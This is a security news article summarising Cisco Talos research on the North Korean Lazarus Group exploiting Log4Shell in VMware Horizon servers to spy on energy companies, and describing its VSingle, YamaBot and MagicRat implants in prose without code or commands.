The North Korean state-sponsored actor Lazarus Group has been compromising VMware Horizon servers by exploiting the Log4j flaw, in order to target energy companies in the U.S., Canada and Japan.
The attacks, observed between February and July, leveraged Log4Shell in order to gain an initial foothold in the victims’ networks before deploying several custom malware implants, including VSingle and YamaBot, both of which are exclusively developed and distributed by Lazarus, as well as a previously unknown malware called MagicRat.
“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” said Jung soo An, Asheer Malhotra and Vitor Ventura, researchers with Cisco Talos, in a Thursday analysis. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
Lazarus, which has been attributed to the North Korean government by the U.S. government, has been active since 2010. Its campaign motives have included espionage, data theft, financial gain and disruptive attacks. Outside of government, defense and critical infrastructure organizations the threat actor has also been targeting cryptocurrency investors, exchanges and blockchain organizations over the past year in order to install malware and steal funds and other data.
After gaining initial access via the Log4j flaw, the threat actor established a reverse shell to issue arbitrary commands, performed preliminary reconnaissance to obtain more network information and directory listings, and disabled protections such as Windows Defender components, before installing malware (of note, VMware Horizon is executed with administrator privileges, so the attacker did not need to elevate privileges).
The malware used in these campaigns included a known malware family developed by Lazarus called VSingle, which has reconnaissance, exfiltration, lateral movement and credential harvesting capabilities. Another incident used a different implant called YamaBot, which is a custom Golang-based malware family that was recently attributed to Lazarus by the Japanese CERT (JPCERT/CC). YamaBot has several standard RAT capabilities, including the abilities to list files and directories, send process information to the command-and-control (C2), download files from remote locations and execute arbitrary commands on the endpoints.
